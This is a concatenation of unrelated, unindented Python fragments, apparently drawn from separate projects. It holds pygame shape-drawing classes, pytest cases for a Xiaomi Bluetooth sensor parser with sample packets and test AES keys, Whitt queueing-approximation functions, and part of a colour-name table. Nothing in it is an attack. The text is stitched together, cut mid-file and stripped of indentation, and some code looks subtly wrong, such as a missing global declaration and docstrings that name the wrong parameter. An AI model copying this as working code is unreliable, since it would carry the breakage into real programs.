down_cic = [POSITION[0],POSITION[1]+g_c_rad]
left_cic = [POSITION[0]-g_c_rad,POSITION[1]]
right_cic = [POSITION[0]+g_c_rad,POSITION[1]]
self.up = up_cic
self.down = down_cic
self.left = left_cic
self.right = right_cic
def ON_CENTER(self):
global g_c_rad , g_c_pos
POSITION = self.POSITION
g_c_pos = POSITION
up_cic = [POSITION[0],POSITION[1]-g_c_rad]
down_cic = [POSITION[0],POSITION[1]+g_c_rad]
left_cic = [POSITION[0]-g_c_rad,POSITION[1]]
right_cic = [POSITION[0]+g_c_rad,POSITION[1]]
self.up = up_cic
self.down = down_cic
self.left = left_cic
self.right = right_cic
def GET_POSITION(self):
return self.pos
class Ellips:
def __init__(self,COLOR=(),POSITION=[],SIZE=[],THICKNESS=0,SURF=0,FUNCTION='none'):
global g_e_size , g_e_pos
center = [POSITION[0] + SIZE[0]/2,POSITION[1] + SIZE[1]/2]
self.sh2 = 1
self.sh = THICKNESS
self.center = center
self.size = SIZE ; g_e_size = self.size
self.col = COLOR
self.obv_color = 'black'
self.pos = POSITION ; g_e_pos = self.pos
if SURF=='s' and type(SURF)==str:self.surf=screen
else:self.surf = SURF
el_up = [POSITION[0]+SIZE[0]/2,POSITION[1]] ; self.up = el_up
el_down = [POSITION[0]+SIZE[0]/2,POSITION[1]+SIZE[1]] ; self.down = el_down
el_left = [POSITION[0],POSITION[1]+SIZE[1]/2] ; self.left = el_left
el_right = [POSITION[0]+SIZE[0],POSITION[1]+SIZE[1]/2] ; self.right = el_right
if FUNCTION=='D':
if g_pos!=None:self.pos = g_pos
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.ellipse(self.surf,self.col,rect,self.sh)
elif FUNCTION[1]=='D':
COLOR = [int(FUNCTION[3:6]),int(FUNCTION[7:10]),int(FUNCTION[11:14])]
THICKNESS = int(FUNCTION[15:len(FUNCTION)])
if g_pos!=None:self.pos = g_pos
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.ellipse(self.surf,self.col,rect,self.sh)
if COLOR!=None:self.obv_color = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.ellipse(self.surf,self.obv_color,rect,self.sh2)
elif FUNCTION[0]=='O':
COLOR = [int(FUNCTION[2:5]),int(FUNCTION[6:9]),int(FUNCTION[10:13])]
THICKNESS = int(FUNCTION[14:len(FUNCTION)])
if COLOR!=None:self.obv_color = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
if g_pos!=None:self.pos = g_pos
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.ellipse(self.surf,self.obv_color,rect,self.sh2)
else:
pass
def FILL(self):
global g_e_pos
if g_e_pos!=None:self.pos = g_e_pos
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.ellipse(self.surf,self.col,rect,self.sh)
def OUTLINE(self,COLOR=None,THICKNESS=None):
global g_e_pos
if COLOR!=None:self.obv_color = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
if g_e_pos!=None:self.pos = g_e_pos
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.ellipse(self.surf,self.obv_color,rect,self.sh2)
def FILLOUT(self,COLOR=None,THICKNESS=None):
global g_e_pos
if g_e_pos!=None:self.pos = g_e_pos
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.ellipse(self.surf,self.col,rect,self.sh)
if COLOR!=None:self.obv_color = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.ellipse(self.surf,self.obv_color,rect,self.sh2)
def SET_SIZE(self,SIZE=[]):
self.size = SIZE
def GET_CENTER(self):
return self.center
def GET_THICKNESS(self):
return self.sh
def GET_SURF(self):
return self.surf
def SET_COLOR(self,COLOR=()):
self.col = COLOR
def GET_SIZE(self):
return self.size
def GET_OUTLINE_THICKNESS(self):
return self.sh2
def SET_OUTLINE_THICKNESS(self,OUTLINE_THICKNESS):
self.sh2 = OUTLINE_THICKNESS
def SET_THICKNESS(self,THICKNESS):
self.sh = THICKNESS
class SET_POSITION():
def __init__(self,POSITION=[]):
global g_e_pos , g_e_size
self.POSITION = POSITION
g_e_pos = POSITION
el_up = [POSITION[0]+g_e_size[0]/2,POSITION[1]]
el_down = [POSITION[0]+g_e_size[0]/2,POSITION[1]+g_e_size[1]]
el_left = [POSITION[0],POSITION[1]+g_e_size[1]/2]
el_right = [POSITION[0]+g_e_size[0],POSITION[1]+g_e_size[1]/2]
self.up = el_up
self.down = el_down
self.left = el_left
self.right = el_right
def ON_CENTER(self):
global g_pos
POSITION = self.POSITION
g_e_pos = [POSITION[0]-g_e_size[0]/2,POSITION[1]-g_e_size[1]/2]
el_up = [POSITION[0]+g_e_size[0]/2,POSITION[1]]
el_down = [POSITION[0]+g_e_size[0]/2,POSITION[1]+g_e_size[1]]
el_left = [POSITION[0],POSITION[1]+g_e_size[1]/2]
el_right = [POSITION[0]+g_e_size[0],POSITION[1]+g_e_size[1]/2]
self.up = el_up
self.down = el_down
self.left = el_left
self.right = el_right
| |
"""The tests for the Xiaomi ble_parser."""
from ble_monitor.ble_parser import BleParser
class TestXiaomi:
def test_Xiaomi_LYWSDCGQ(self):
"""Test Xiaomi parser for LYWSDCGQ."""
data_string = "043e2502010000219335342d5819020106151695fe5020aa01da219335342d580d1004fe004802c4"
data = bytes(bytearray.fromhex(data_string))
# pylint: disable=unused-variable
ble_parser = BleParser()
sensor_msg, tracker_msg = ble_parser.parse_data(data)
assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V2)"
assert sensor_msg["type"] == "LYWSDCGQ"
assert sensor_msg["mac"] == "582D34359321"
assert sensor_msg["packet"] == 218
assert sensor_msg["data"]
assert sensor_msg["temperature"] == 25.4
assert sensor_msg["humidity"] == 58.4
assert sensor_msg["rssi"] == -60
def test_Xiaomi_CGG1(self):
"""Test Xiaomi parser for CGG1."""
data_string = "043e2a020100005f12342d585a1e0201061a1695fe5858480b685f12342d585a0b1841e2aa000e00a4964fb5b6"
data = bytes(bytearray.fromhex(data_string))
aeskey = "<KEY>"
self.aeskeys = {}
p_mac = bytes.fromhex("5A582D34125F")
p_key = bytes.fromhex(aeskey.lower())
self.aeskeys[p_mac] = p_key
allow_list = self.aeskeys.keys()
# pylint: disable=unused-variable
ble_parser = BleParser(aeskeys=self.aeskeys, discovery=False, sensor_whitelist=allow_list)
sensor_msg, tracker_msg = ble_parser.parse_data(data)
assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V5 encrypted)"
assert sensor_msg["type"] == "CGG1-ENCRYPTED"
assert sensor_msg["mac"] == "5A582D34125F"
assert sensor_msg["packet"] == 104
assert sensor_msg["data"]
assert sensor_msg["humidity"] == 59.6
assert sensor_msg["rssi"] == -74
def test_Xiaomi_CGDK2(self):
"""Test Xiaomi parser for CGDK2."""
data_string = "043e2a02010000892012342d581e0201061a1695fe58586f0607892012342d585f176dd54f0200002fa453faaf"
data = bytes(bytearray.fromhex(data_string))
aeskey = "a3bfe9853dd85a620debe3620caaa351"
self.aeskeys = {}
is_ext_packet = True if data[3] == 0x0D else False
mac = (data[8 if is_ext_packet else 7:14 if is_ext_packet else 13])[::-1]
mac_address = mac.hex()
p_mac = bytes.fromhex(mac_address.replace(":", "").lower())
p_key = bytes.fromhex(aeskey.lower())
self.aeskeys[p_mac] = p_key
# pylint: disable=unused-variable
ble_parser = BleParser(aeskeys=self.aeskeys)
sensor_msg, tracker_msg = ble_parser.parse_data(data)
assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V5 encrypted)"
assert sensor_msg["type"] == "CGDK2"
assert sensor_msg["mac"] == "582D34122089"
assert sensor_msg["packet"] == 7
assert sensor_msg["data"]
assert sensor_msg["temperature"] == 22.6
assert sensor_msg["rssi"] == -81
def test_Xiaomi_LYWSD02(self):
"""Test Xiaomi parser for LYWSD02."""
def test_Xiaomi_LYWSD03MMC(self):
"""Test Xiaomi parser for LYWSD03MMC without encryption."""
data_string = "043e22020100004c94b438c1a416151695fe50305b05034c94b438c1a40d10041001ea01cf"
data = bytes(bytearray.fromhex(data_string))
# pylint: disable=unused-variable
ble_parser = BleParser()
sensor_msg, tracker_msg = ble_parser.parse_data(data)
assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V3)"
assert sensor_msg["type"] == "LYWSD03MMC"
assert sensor_msg["mac"] == "A4C138B4944C"
assert sensor_msg["packet"] == 3
assert sensor_msg["data"]
assert sensor_msg["temperature"] == 27.2
assert sensor_msg["humidity"] == 49.0
assert sensor_msg["rssi"] == -49
def test_Xiaomi_LYWSD03MMC_encrypted(self):
"""Test Xiaomi parser for LYWSD03MMC with encryption."""
data_string = "043e2a02010000f4830238c1a41e0201061a1695fe58585b0550f4830238c1a495ef58763c26000097e2abb5e2"
data = bytes(bytearray.fromhex(data_string))
aeskey = "e9ea895fac7cca6d30532432a516f3a8"
self.aeskeys = {}
is_ext_packet = True if data[3] == 0x0D else False
mac = (data[8 if is_ext_packet else 7:14 if is_ext_packet else 13])[::-1]
mac_address = mac.hex()
p_mac = bytes.fromhex(mac_address.replace(":", "").lower())
p_key = bytes.fromhex(aeskey.lower())
self.aeskeys[p_mac] = p_key
# pylint: disable=unused-variable
ble_parser = BleParser(aeskeys=self.aeskeys)
sensor_msg, tracker_msg = ble_parser.parse_data(data)
assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V5 encrypted)"
assert sensor_msg["type"] == "LYWSD03MMC"
assert sensor_msg["mac"] == "A4C1380283F4"
assert sensor_msg["packet"] == 80
assert sensor_msg["data"]
assert sensor_msg["humidity"] == 46.7
assert sensor_msg["rssi"] == -30
def test_Xiaomi_CGC1(self):
"""Test Xiaomi parser for CGC1."""
def test_Xiaomi_CGD1(self):
"""Test Xiaomi parser for CGD1."""
def test_Xiaomi_CGP1W(self):
"""Test Xiaomi parser for CGP1W."""
def test_Xiaomi_MHO_C303(self):
"""Test Xiaomi parser for MHO-C303."""
def test_Xiaomi_MHO_C401(self):
"""Test Xiaomi parser for MHO-C401."""
def test_Xiaomi_JQJCY01YM1(self):
"""Test Xiaomi parser for JQJCY01YM."""
def test_Xiaomi_JTYJGD03MI_smoke(self):
"""Test Xiaomi parser for JTYJGD03MI."""
data_string = "043e2902010000bc9ce344ef541d020106191695fe5859970966bc9ce344ef5401081205000000715ebe90cb"
data = bytes(bytearray.fromhex(data_string))
aeskey = "5b51a7c91cde6707c9ef18dfda143a58"
self.aeskeys = {}
is_ext_packet = True if data[3] == 0x0D else False
mac = (data[8 if is_ext_packet else 7:14 if is_ext_packet else 13])[::-1]
mac_address = mac.hex()
p_mac = bytes.fromhex(mac_address.replace(":", "").lower())
p_key = bytes.fromhex(aeskey.lower())
self.aeskeys[p_mac] = p_key
# pylint: disable=unused-variable
ble_parser = BleParser(aeskeys=self.aeskeys)
sensor_msg, tracker_msg = ble_parser.parse_data(data)
assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V5 encrypted)"
assert sensor_msg["type"] == "JTYJGD03MI"
assert sensor_msg["mac"] == "54EF44E39CBC"
assert sensor_msg["packet"] == 102
assert sensor_msg["data"]
assert sensor_msg["smoke detector"] == 1
assert sensor_msg["rssi"] == -53
def test_Xiaomi_JTYJGD03MI_press(self):
"""Test Xiaomi parser for JTYJGD03MI."""
data_string = "043e2b02010000bc9ce344ef541f0201061b1695fe5859970964bc9ce344ef5422206088fd000000003a148fb3cb"
data = bytes(bytearray.fromhex(data_string))
aeskey = "5b51a7c91cde6707c9ef18dfda143a58"
self.aeskeys = {}
is_ext_packet = True if data[3] == 0x0D else False
mac = (data[8 if is_ext_packet else 7:14 if is_ext_packet else 13])[::-1]
mac_address = mac.hex()
p_mac = bytes.fromhex(mac_address.replace(":", "").lower())
p_key = bytes.fromhex(aeskey.lower())
self.aeskeys[p_mac] = p_key
# pylint: disable=unused-variable
ble_parser = BleParser(aeskeys=self.aeskeys)
sensor_msg, tracker_msg = ble_parser.parse_data(data)
assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V5 encrypted)"
assert sensor_msg["type"] == "JTYJGD03MI"
assert sensor_msg["mac"] == "54EF44E39CBC"
assert sensor_msg["packet"] == 100
assert sensor_msg["data"]
assert sensor_msg["button"] == "single press"
assert sensor_msg["rssi"] == -53
def test_Xiaomi_HHCCJCY01(self):
"""Test Xiaomi parser for HHCCJCY01."""
data_string = "043e2802010000f34f6b8d7cc41c020106030295fe141695fe7120980012f34f6b8d7cc40d041002c400a9"
data = bytes(bytearray.fromhex(data_string))
# pylint: disable=unused-variable
ble_parser = BleParser()
sensor_msg, tracker_msg = ble_parser.parse_data(data)
assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V2)"
assert sensor_msg["type"] == "HHCCJCY01"
assert sensor_msg["mac"] == "C47C8D6B4FF3"
assert sensor_msg["packet"] == 18
assert sensor_msg["temperature"] == 19.6
assert sensor_msg["data"]
assert sensor_msg["rssi"] == -87
def test_Xiaomi_GCLS002(self):
"""Test Xiaomi parser for GCLS002 / HHCCJCY09."""
data_string = "043E28020100003E596D8D7CC41C020106030295FE141695FE7120BC03CD3E596D8D7CC40D0410023C01A8"
data = bytes(bytearray.fromhex(data_string))
# pylint: disable=unused-variable
ble_parser = BleParser()
sensor_msg, tracker_msg = ble_parser.parse_data(data)
assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V2)"
assert sensor_msg["type"] == "GCLS002"
assert sensor_msg["mac"] == "C47C8D6D593E"
assert sensor_msg["packet"] == 205
assert sensor_msg["temperature"] == 31.6
assert sensor_msg["data"]
assert sensor_msg["rssi"] == -88
def test_Xiaomi_HHCCPOT002(self):
"""Test Xiaomi parser for HHCCPOT002."""
def test_Xiaomi_WX08ZM(self):
"""Test Xiaomi parser for WX08ZM."""
def test_Xiaomi_MCCGQ02HL(self):
"""Test Xiaomi parser for MCCGQ02HL."""
def test_Xiaomi_CGH1(self):
"""Test Xiaomi parser for CGH1."""
def test_Xiaomi_YM_K1501(self):
"""Test Xiaomi parser for YM-K1501."""
def test_Xiaomi_V_SK152(self):
"""Test Xiaomi parser for V-SK152."""
def test_Xiaomi_SJWS01LM(self):
"""Test Xiaomi parser for SJWS01LM."""
def test_Xiaomi_MJYD02YL(self):
"""Test Xiaomi parser for MJYD02YL."""
def test_Xiaomi_MUE4094RT(self):
"""Test Xiaomi parser for MUE4094RT."""
data_string = "043e1c020102010c39b2e870de100201060c1695fe4030dd032403000101c6"
data = bytes(bytearray.fromhex(data_string))
# pylint: disable=unused-variable
ble_parser = BleParser()
sensor_msg, tracker_msg = ble_parser.parse_data(data)
assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V3)"
assert sensor_msg["type"] == "MUE4094RT"
assert sensor_msg["mac"] == "DE70E8B2390C"
assert sensor_msg["packet"] == 36
assert sensor_msg["data"]
assert sensor_msg["motion"] == 1
assert sensor_msg["motion timer"] == 1
assert sensor_msg["rssi"] == -58
def test_Xiaomi_RTCGQ02LM(self):
"""Test Xiaomi parser for RTCGQ02LM with wrong encryption key."""
data_string = "043e2b020103000fc4e044ef541f0201061b1695fe58598d0a170fc4e044ef547cc27a5c03a1000000790df258bb"
data = bytes(bytearray.fromhex(data_string))
aeskey = "FFD8CE9C08AE7533A79BDAF0BB755E96"
self.aeskeys = {}
is_ext_packet = True if data[3] == 0x0D else False
mac = (data[8 if is_ext_packet else 7:14 if is_ext_packet else 13])[::-1]
mac_address = mac.hex()
p_mac = bytes.fromhex(mac_address.replace(":", "").lower())
p_key = bytes.fromhex(aeskey.lower())
self.aeskeys[p_mac] = p_key
# pylint: disable=unused-variable
ble_parser = BleParser(aeskeys=self.aeskeys)
sensor_msg, tracker_msg = ble_parser.parse_data(data)
assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V5 encrypted)"
assert sensor_msg["type"] == "RTCGQ02LM"
assert sensor_msg["mac"] == "54EF44E0C40F"
assert sensor_msg["packet"] == 23
assert sensor_msg["data"] is False
assert sensor_msg["rssi"] == -69
def test_Xiaomi_CGPR1(self):
"""Test Xiaomi parser for CGPR1."""
def test_Xiaomi_MMC_T201_1(self):
"""Test Xiaomi parser for MMC-T201-1."""
data_string = "043e2b02010000c16fddf981001f02010603020918171695fe7022db006fc16fddf9810009002005c60d630d51b1"
data = bytes(bytearray.fromhex(data_string))
# pylint: disable=unused-variable
ble_parser = BleParser()
sensor_msg, tracker_msg = ble_parser.parse_data(data)
assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V2)"
assert sensor_msg["type"] == "MMC-T201-1"
assert sensor_msg["mac"] == "0081F9DD6FC1"
assert sensor_msg["packet"] == 111
assert sensor_msg["data"]
assert sensor_msg["temperature"] == 36.87199806168224
assert sensor_msg["battery"] == 81
assert sensor_msg["rssi"] == -79
def test_Xiaomi_M1S_T500(self):
"""Test Xiaomi parser for M1S-T500."""
data_string = "043e2402010001115b174371e618020106141695fe7130890437115b174371e6091000020003dc"
data = bytes(bytearray.fromhex(data_string))
# pylint: disable=unused-variable
ble_parser = BleParser()
sensor_msg, tracker_msg = ble_parser.parse_data(data)
assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V3)"
assert sensor_msg["type"] == "M1S-T500"
assert sensor_msg["mac"] == "E67143175B11"
assert sensor_msg["packet"] == 55
assert sensor_msg["data"]
assert sensor_msg["toothbrush"] == 1
assert sensor_msg["counter"] == 3
assert sensor_msg["rssi"] == -36
def test_Xiaomi_ZNMS16LM_fingerprint(self):
"""Test Xiaomi parser for ZNMS16LM."""
data_string = "043e2a02010000918aeb441fd71e020106030295fe161695fe50449e0642918aeb441fd7060005ffffffff00a9"
data = bytes(bytearray.fromhex(data_string))
# pylint: disable=unused-variable
ble_parser = BleParser()
sensor_msg, tracker_msg = ble_parser.parse_data(data)
assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V4)"
assert sensor_msg["type"] == "ZNMS16LM"
assert sensor_msg["mac"] == "D71F44EB8A91"
assert sensor_msg["packet"] == 66
assert sensor_msg["data"]
assert sensor_msg["fingerprint"] == 1
assert sensor_msg["result"] == "match successful"
assert sensor_msg["key id"] == "unknown operator"
assert sensor_msg["rssi"] == -87
def test_Xiaomi_ZNMS16LM_lock(self):
"""Test Xiaomi parser for ZNMS16LM."""
data_string = "043e2e02010000918aeb441fd722020106030295fe1a1695fe50449e0643918aeb441fd70b000920020001807c442f61a9"
data = bytes(bytearray.fromhex(data_string))
# pylint: disable=unused-variable
ble_parser = BleParser()
sensor_msg, tracker_msg = ble_parser.parse_data(data)
assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V4)"
assert sensor_msg["type"] == "ZNMS16LM"
assert sensor_msg["mac"] == "D71F44EB8A91"
assert sensor_msg["packet"] == 67
assert sensor_msg["data"]
assert sensor_msg["lock"] == 0
assert sensor_msg["action"] == "unlock outside the door"
assert sensor_msg["method"] == "biometrics"
assert sensor_msg["error"] is None
assert sensor_msg["key id"] == 2
assert sensor_msg["rssi"] == -87
def test_Xiaomi_YLAI003(self):
"""Test Xiaomi parser for YLAI003."""
def test_Xiaomi_YLYK01YL(self):
"""Test Xiaomi parser for YLYK01YL."""
data_string = "043E21020103007450E94124F815141695FE503053013F7450E94124F8011003000000E0"
data = bytes(bytearray.fromhex(data_string))
# pylint: disable=unused-variable
ble_parser = BleParser()
sensor_msg, tracker_msg = ble_parser.parse_data(data)
assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V3)"
assert sensor_msg["type"] == "YLYK01YL"
assert sensor_msg["mac"] == "F82441E95074"
assert sensor_msg["packet"] == 63
assert sensor_msg["data"]
assert sensor_msg["remote"] == "on"
assert sensor_msg["button"] == "single press"
assert sensor_msg["remote single press"] == 1
assert sensor_msg["rssi"] == -32
def test_Xiaomi_YLYK01YL_FANCL(self):
"""Test Xiaomi parser for YLYK01YL-FANCL."""
def test_Xiaomi_YLYK01YL_VENFAN(self):
"""Test Xiaomi parser for YLYK01YL-VENFAN."""
def test_Xiaomi_YLYB01YL_BHFRC(self):
"""Test Xiaomi parser for YLYB01YL-BHFRC."""
def test_Xiaomi_YLKG07YL_press(self):
"""Test Xiaomi parser for YLKG07YL, YLKG08YL while pressing dimmer (no rotation)."""
data_string = "043E25020103008B98C54124F819181695FE5830B603D28B98C54124F8C3491476757E00000099DE"
data = bytes(bytearray.fromhex(data_string))
aeskey | |
float
average arrival rate to queueing system
svc_rate : float
average service rate (each server). 1/svc_rate is mean service time.
c : int
number of servers
ca2 : float
squared coefficient of variation for inter-arrival time distribution
cs2 : float
squared coefficient of variation for service time distribution
Returns
-------
float
variance of conditional wait time in queue
"""
varsojourn = ggm_sojourn_whitt_var(arr_rate, svc_rate, m, ca2, cs2)
meansojourn = ggm_mean_sojourn_whitt(arr_rate, svc_rate, m, ca2, cs2)
cv2 = varsojourn / meansojourn ** 2
return cv2
def ggm_mean_qsize_whitt(arr_rate, svc_rate, m, ca2, cs2):
"""
Return the approximate mean queue size in GI/G/c/inf queue using Whitt's 1993 approximation and Little's Law.
See <NAME>. "Approximations for the GI/G/m queue"
Production and Operations Management 2, 2 (Spring 1993): 114-161.
It's based on interpolations with corrections between an M/D/c, D/M/c and a M/M/c queueing systems.
Parameters
----------
arr_rate : float
average arrival rate to queueing system
svc_rate : float
average service rate (each server). 1/svc_rate is mean service time.
c : int
number of servers
ca2 : float
squared coefficient of variation for inter-arrival time distribution
cs2 : float
squared coefficient of variation for service time distribution
Returns
-------
float
mean wait time in queue
"""
# Use Eq 2.24 on p 125 to compute mean wait time in queue
qwait = ggm_mean_qwait_whitt(arr_rate, svc_rate, m, ca2, cs2)
# Now use Little's Law
return qwait * arr_rate
def ggm_mean_syssize_whitt(arr_rate, svc_rate, m, ca2, cs2):
"""
Return the approximate mean system size in GI/G/c/inf queue using Whitt's 1993 approximation and Little's Law.
See <NAME>. "Approximations for the GI/G/m queue"
Production and Operations Management 2, 2 (Spring 1993): 114-161.
It's based on interpolations with corrections between an M/D/c, D/M/c and a M/M/c queueing systems.
Parameters
----------
arr_rate : float
average arrival rate to queueing system
svc_rate : float
average service rate (each server). 1/svc_rate is mean service time.
c : int
number of servers
ca2 : float
squared coefficient of variation for inter-arrival time distribution
cs2 : float
squared coefficient of variation for service time distribution
Returns
-------
float
mean wait time in queue
"""
# Use Eq 2.24 on p 125 to compute mean wait time in queue
mean_sojourn = ggm_mean_sojourn_whitt(arr_rate, svc_rate, m, ca2, cs2)
# Now use Little's Law
return mean_sojourn * arr_rate
def dmm_mean_qwait_whitt(arr_rate, svc_rate, m, ca2=0.0, cs2=1.0):
"""
Return the approximate mean queue size in D/M/m/inf queue using Whitt's 1993 approximation.
See Whitt, Ward. "Approximations for the GI/G/m queue"
Production and Operations Management 2, 2 (Spring 1993): 114-161. Specifically, this approximation
is Eq 2.20 on p124.
This, along with mdm_mean_qwait_whitt are refinements of the Cosmetatos approximations.
Parameters
----------
arr_rate : float
average arrival rate to queueing system
svc_rate : float
average service rate (each server). 1/svc_rate is mean service time.
c : int
number of servers
ca2 : float
squared coefficient of variation for inter-arrival time distribution (0 for D)
cs2 : float
squared coefficient of variation for service time distribution (1 for M)
Returns
-------
float
mean wait time in queue
"""
rho = arr_rate / (svc_rate * float(m))
# Now implement Eq 2.20 on p 124
term1 = _ggm_mean_qwait_whitt_phi_3(m, rho)
term2 = 0.5 * (ca2 + cs2)
term3 = mmc_mean_qwait(arr_rate, svc_rate, m)
return term1 * term2 * term3
def mdm_mean_qwait_whitt(arr_rate, svc_rate, m, ca2=0.0, cs2=1.0):
"""
Return the approximate mean queue size in M/D/m/inf queue using Whitt's 1993 approximation.
See <NAME>. "Approximations for the GI/G/m queue"
Production and Operations Management 2, 2 (Spring 1993): 114-161. Specifically, this approximation
is Eq 2.16 on p124.
This, along with dmm_mean_qwait_whitt are refinements of the Cosmetatos approximations.
Parameters
----------
arr_rate : float
average arrival rate to queueing system
svc_rate : float
average service rate (each server). 1/svc_rate is mean service time.
c : int
number of servers
ca2 : float
squared coefficient of variation for inter-arrival time distribution (0 for D)
cs2 : float
squared coefficient of variation for service time distribution (1 for M)
Returns
-------
float
mean wait time in queue
"""
rho = arr_rate / (svc_rate * float(m))
# Now implement Eq 2.16 on p 124
term1 = _ggm_mean_qwait_whitt_phi_1(m, rho)
term2 = 0.5 * (ca2 + cs2)
term3 = mmc_mean_qwait(arr_rate, svc_rate, m)
return term1 * term2 * term3
def fit_balanced_hyperexpon2(mean, cs2):
"""
Return the branching probability and rates for a balanced H2 distribution based
on a specified mean and scv. Intended for scv's > 1.
See <NAME>. "Approximations for the GI/G/m queue"
Production and Operations Management 2, 2 (Spring 1993): 114-161.
Parameters
----------
cs2 : float
squared coefficient of variation for desired distribution
Returns
-------
tuple (float p, float rate1, float rate2)
branching probability and exponential rates
"""
p1 = 0.5 * (1 + np.sqrt((cs2-1) / (cs2+1)))
p2 = 1 - p1
mu1 = 2 * p1 / mean
mu2 = 2 * p2 / mean
return (p1, mu1, mu2)
def hyperexpon_cdf(x, probs, rates):
"""
Return the P(X < x) where X is hypergeometric with probabilities and exponential rates
in lists probs and rates.
Parameters
----------
probs : list of floats
branching probabilities for hyperexponential
probs : list of floats
exponential rates
Returns
-------
float
P(X<x) where X~hyperexponetial(probs, rates)
"""
sumproduct = sum([p * np.exp(-r * x) for (p, r) in zip(probs, rates)])
prob_lt_x = 1.0 - sumproduct
return prob_lt_x
def ggm_qcondwait_cdf_whitt(t, arr_rate, svc_rate, c, ca2, cs2):
"""
Return the approximate P(D <= t) where D = (W|W>0) in G/G/m queue using Whitt's two moment
approximation.
See Section 4 of <NAME>. "Approximations for the GI/G/m queue"
Production and Operations Management 2, 2 (Spring 1993): 114-161.
It's based on an approach he originally used for G/G/1 queues in QNA. There are different
cases based on the value of an approximation for the scv of D.
Parameters
----------
t : float
wait time of interest
arr_rate : float
average arrival rate to queueing system
svc_rate : float
average service rate (each server). 1/svc_rate is mean service time.
c : int
number of servers
cv2_svc_time : float
squared coefficient of variation for service time distribution
Returns
-------
float
~ P(D <= t | )
"""
rho = arr_rate / (svc_rate * float(c))
ed = ggm_mean_qwait_whitt(arr_rate, svc_rate, c, ca2, cs2) / ggm_prob_wait_whitt(arr_rate, svc_rate, c, ca2, cs2)
cd2 = ggm_qcondwait_whitt_cd2(rho,cs2)
if cd2 > 1.01:
# Hyperexponential approx
p1, gamma1, gamma2 = fit_balanced_hyperexpon2(ed, cd2)
p2 = 1.0 - p1
prob_wait_ltx = hyperexpon_cdf(t, [p1,p2], [gamma1, gamma2])
elif cd2 >= 0.99 and cd2 <= 1.01:
# Exponential approx
prob_wait_ltx = stats.expon.cdf(t,scale=ed)
elif cd2 >= 0.501 and cd2 < 0.99:
# Convolution of two exponentials approx
vard = ggm_qcondwait_whitt_vard(arr_rate, svc_rate, c, ca2, cs2)
gamma2 = 2.0 / (ed + np.sqrt(2 * vard - ed ** 2))
gamma1 = 1.0 / (ed - 1.0 / gamma2)
prob_wait_gtx = (gamma1 * np.exp(-gamma2 * t) - gamma2 * np.exp(-gamma1 * t)) / (gamma1 - gamma2)
prob_wait_ltx = 1.0 - prob_wait_gtx
else:
# Erlang approx
gamma1 = 2.0 / ed
prob_wait_gtx = np.exp(-gamma1 * t) * (1.0 + gamma1 * t)
prob_wait_ltx = 1.0 - prob_wait_gtx
return prob_wait_ltx
def ggm_qwait_cdf_whitt(t, arr_rate, svc_rate, c, ca2, cs2):
"""
Return the approximate P(W <= t) in G/G/m queue using Whitt's two moment
approximation for conditional wait and the P(W>0).
See Section 4 of Whitt, Ward. "Approximations for the GI/G/m queue"
Production and Operations Management 2, 2 (Spring 1993): 114-161.
See ggm_qcondwait_cdf_whitt for more details.
Parameters
----------
t : float
wait time of interest
arr_rate : float
average arrival rate to queueing system
svc_rate : float
average service rate (each server). 1/svc_rate is mean service time.
c : int
number of servers
cv2_svc_time : float
squared coefficient of variation for service time distribution
Returns
-------
float
~ P(W <= t | )
"""
qcondwait = ggm_qcondwait_cdf_whitt(t, arr_rate, svc_rate, c, ca2, cs2)
pdelay = ggm_prob_wait_whitt(arr_rate, svc_rate, c, ca2, cs2)
qwait = qcondwait * pdelay + (1.0 - pdelay)
return qwait
def ggm_qwait_pctile_whitt(p, arr_rate, svc_rate, c, ca2, | |
"Big Sky": 0xCDE2DE,
"Big Spender": 0xACDDAF,
"Big Stone": 0x334046,
"Big Stone Beach": 0x886E54,
"Big Sur": 0xB3CADC,
"Big Sur Blue Jade": 0x3F6E8E,
"Big Surf": 0x96D0D1,
"Big Yellow Streak": 0xFFEE22,
"Big Yellow Taxi": 0xFFFF33,
"Bigfoot": 0x715145,
"Bighorn Sheep": 0x20120E,
"Bijou Blue": 0x4E5E7F,
"Bijou Red": 0xA33D3B,
"Bijoux Green": 0x676B55,
"Biking Red": 0x77212E,
"Biking Trail": 0xC3C0B1,
"Bilbao": 0x3E8027,
"Bilberry": 0x71777E,
"Bile": 0xB5C306,
"Bilious Brown": 0xE39F08,
"Bilious Green": 0xA9D171,
"Billabong": 0x1B6F81,
"Billet": 0xAD7C35,
"Billiard": 0x00AA92,
"Billiard Ball": 0x276B40,
"Billiard Green": 0x305A4A,
"Billiard Room": 0x50846E,
"Billiard Table": 0x155843,
"Billowing Clouds": 0xD8DEE3,
"Billowing Sail": 0xD8E7E7,
"Billowing Smoke": 0x6E726A,
"Billowy Breeze": 0xAFC7CD,
"Billowy Clouds": 0xF6F0E9,
"Billowy Down": 0xEFF0E9,
"Billycart Blue": 0x4C77A4,
"Biloba Flower": 0xAE99D2,
